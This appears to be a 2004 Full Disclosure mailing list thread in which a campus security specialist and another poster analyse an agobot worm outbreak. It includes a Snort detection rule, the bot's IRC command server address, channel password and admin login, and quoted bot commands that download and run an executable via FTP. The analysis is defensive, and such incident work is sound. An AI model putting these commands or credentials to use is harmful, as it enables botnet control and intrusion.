Full Disclosure mailing list archives
RE: Re: Outbreak of a virus on campus
From: "David Hale" <ddh () mtu edu>
Date: Sun, 25 Apr 2004 02:52:09 -0400 (EDT)
We have currently blocked connections to port to/from 7000 on the following hosts: 130.74.82.206 131.234.100.43 193.87.20.31 This seems to have contained the spread of the worm within our campus. The list of hosts was gathered with a snort signature of: alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic"; content:"weednet";classtype:bad-unknown; sid:71727; rev:1;) Until the block was in place we had shut down around 50 hosts (mainly on our dorm network) that had been infected with the worm. -Dave Hale Sr. Security Specialist Michigan Technological University
----- Original Message ----- From: "Morning Wood" Date: Sat, 24 Apr 2004 18:37:31 +0000 To: mueller () fidnet com, full-disclosure () lists netsys com Subject: RE: [Full-disclosure] Re: Outbreak of a virus on campusphatbot?This one is yet another agobot. Has long list of useful commands (included in the end of posting, if someone is interested...), polymorph capability, stealth capability -hides its own process in memory and binary from listing, capable of updating itself via ftp/http, has list of servers for evaluating connection speed, steals cdkeys, sniffs a wire, performs ddos, capable installing a proxy, sends spam via aol, can install identd, has LONG list various processes to kill (mostly AV, but also regedit and tcpview among others), retrievs sysinfo, makes screenshots etc etc etc - looks similar to others good household bot's :) What makes its interesting - its stealth capability and propagation. It has following scanning/propagation subroutines: CScannerBagle CScannerBase CScannerDCOM CScannerDoom CScannerDW CScannerHTTP CScannerNetBios CScannerOptix CScannerSQL CScannerUPNP CScannerWKS When worm is started, it connects to irc server 193.87.20.31 (irc.weednet.net) port 7000. Then it joines to password ptotected channel #1337, password is heyho. As channel topic is .scan.startall, it accepts command and starts right away scanning. I took my trusty irc client and joined to that channel by myself. Right away admin gave me those commands: <admin> .login stebo jamesbond007 -s <admin> .ftp.update ftp://ftp:bla () ftp uni-freiburg de/incoming/dt.exe %TEMP%\xgf.exeBLAOR12 <admin> .scan.stop <admin> .ftp.update ftp://ftp:bla () ftp uni-freiburg de/incoming/dt.exe c:\xgf.exe BLAOR12 seems like my 'bot' version was too old :) have fun :) W. ----------------------- commands and parameters all commands starts with . (dot)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Outbreak of a virus on campus RMueller (Apr 24)
- <Possible follow-ups>
- RE: Re: Outbreak of a virus on campus Morning Wood (Apr 24)
- RE: Re: Outbreak of a virus on campus Willem Koenings (Apr 24)
- RE: Re: Outbreak of a virus on campus David Hale (Apr 25)
- RE: Re: Outbreak of a virus on campus David Hale (Apr 25)
- RE: Re: Outbreak of a virus on campus David Hale (Apr 25)